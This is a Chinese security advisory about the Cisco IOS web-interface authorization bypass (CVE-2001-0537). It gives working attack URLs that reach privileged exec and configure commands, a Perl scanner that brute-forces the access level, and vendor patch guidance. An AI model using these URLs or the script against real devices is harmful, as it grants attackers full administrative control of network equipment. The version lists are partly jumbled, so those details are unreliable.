首页 -> 安全研究
安全研究
安全漏洞
Cisco IOS Web配置接口安全认证可被绕过漏洞
发布日期:2000-06-27
更新日期:2000-07-04
受影响系统:
Cisco IOS 12.2XQ不受影响系统:
Cisco IOS 12.2XH
Cisco IOS 12.2XE
Cisco IOS 12.2XD
Cisco IOS 12.2XA
Cisco IOS 12.2T
Cisco IOS 12.2
Cisco IOS 12.1YF
Cisco IOS 12.1YD
Cisco IOS 12.1YC
Cisco IOS 12.1YB
Cisco IOS 12.1YA
Cisco IOS 12.1XZ
Cisco IOS 12.1XY
Cisco IOS 12.1XX
Cisco IOS 12.1XW
Cisco IOS 12.1XV
Cisco IOS 12.1XU
Cisco IOS 12.1XT
Cisco IOS 12.1XS
Cisco IOS 12.1XR
Cisco IOS 12.1XQ
Cisco IOS 12.1XP
Cisco IOS 12.1XM
Cisco IOS 12.1XL
Cisco IOS 12.1XK
Cisco IOS 12.1XJ
Cisco IOS 12.1XI
Cisco IOS 12.1XH
Cisco IOS 12.1XG
Cisco IOS 12.1XF
Cisco IOS 12.1XE
Cisco IOS 12.1XD
Cisco IOS 12.1XC
Cisco IOS 12.1XB
Cisco IOS 12.1XA
Cisco IOS 12.1T
Cisco IOS 12.1EZ
Cisco IOS 12.1EY
Cisco IOS 12.1EX
Cisco IOS 12.1EC
Cisco IOS 12.1E
Cisco IOS 12.1DC
Cisco IOS 12.1DB
Cisco IOS 12.1DA
Cisco IOS 12.1CX
Cisco IOS 12.1AA
Cisco IOS 12.1
Cisco IOS 12.0XV
Cisco IOS 12.0XU
Cisco IOS 12.0XS
Cisco IOS 12.0XR
Cisco IOS 12.0XQ
Cisco IOS 12.0XP
Cisco IOS 12.0XN
Cisco IOS 12.0XM
Cisco IOS 12.0XL
Cisco IOS 12.0XH
Cisco IOS 12.0XG
Cisco IOS 12.0XF
Cisco IOS 12.0XE
Cisco IOS 12.0XD
Cisco IOS 12.0XC
Cisco IOS 12.0XB
Cisco IOS 12.0XA
Cisco IOS 12.0WT
Cisco IOS 12.0WC
Cisco IOS 12.0T
Cisco IOS 12.0ST
Cisco IOS 12.0SL
Cisco IOS 12.0SC
Cisco IOS 12.0S
Cisco IOS 12.0DC
Cisco IOS 12.0DB
Cisco IOS 12.0DA
Cisco IOS 12.0(7)XK
Cisco IOS 12.0(5)XK
Cisco IOS 12.0(14)W5(20)
Cisco IOS 12.0(10)W5(18g)
Cisco IOS 12.0
Cisco IOS 11.3XA
Cisco IOS 11.3T
Cisco IOS 11.3NA
Cisco IOS 11.3MA
Cisco IOS 11.3HA
Cisco IOS 11.3DB
Cisco IOS 11.3DA
Cisco IOS 11.3AA
Cisco IOS 11.3
Cisco IOS 11.2描述:
Cisco IOS 11.1
Cisco IOS 11.0
Cisco IOS 10.3
BUGTRAQ ID: 2936
CVE(CAN) ID: CVE-2001-0537
IOS是Cisco公司开发的路由器固件。IOS支持很多Cisoco设备(包括路由器和交换机)。
在Cisco IOS 11.3开始的版本存在一个安全问题,如果它开放了Web管理接口,将允许任意远程攻击者获取该设备的完全的管理权限。
攻击者只需要构造一个如下的URL:
http://<device_addres>/level/xx/exec/....
这里的xx是一个从16-99之间的整数。对于不同的设备,这个数值可能是不同的,但是攻击者仅需要测试84次即可找到正确的数值。
这个问题可能导致远程用户获取完全的管理权限,并进一步对网络进行渗透,也可能造成拒绝服务攻击漏洞。
<*来源:David Hyams (david.hyams@kmu-security.ch)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=99412558209317&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=99418754908119&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=99418836410749&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=99436383524007&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=99436557821516&w=2
http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://<device_addres>/level/42/configure/-/banner/motd/LINE
http://<device_addres>/level/xx/configure
http://<device_addres>/level/42/exec/show%20conf
Ertan Kurt < ertank@olympos.org >提供了如下测试代码:
#!/usr/bin/perl
# modified roelof's uni.pl
# to check cisco ios http auth bug
# cronos <cronos@olympos.org>
use Socket;
print "enter IP (x.x.x.x): ";
$host= <STDIN>;
chop($host);
$i=16;
$port=80;
$target = inet_aton($host);
$flag=0;
LINE: while ($i<100) {
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
foreach $line (@results){
$line=~ tr/A-Z/a-z/;
if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
}
if ($flag==1){print "Not Vulnerable with $i\n\r";}
else {print "$line Vulnerable with $i\n\r"; last LINE; }
$i++;
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
}
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时禁止有问题设备的Web管理功能。
厂商补丁:
Cisco
-----
Cisco已经为此发布了一个安全公告(CI-01.08)以及相应补丁:
CI-01.08:IOS HTTP authorization vulnerability
链接:
您可以在下列地址看到公告的详细内容,同时根据您使用的Cisco设备的型号,选择相应的补丁或升级版本:
http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
浏览次数:6834
严重程度:0(网友投票)
绿盟科技给您安全的保障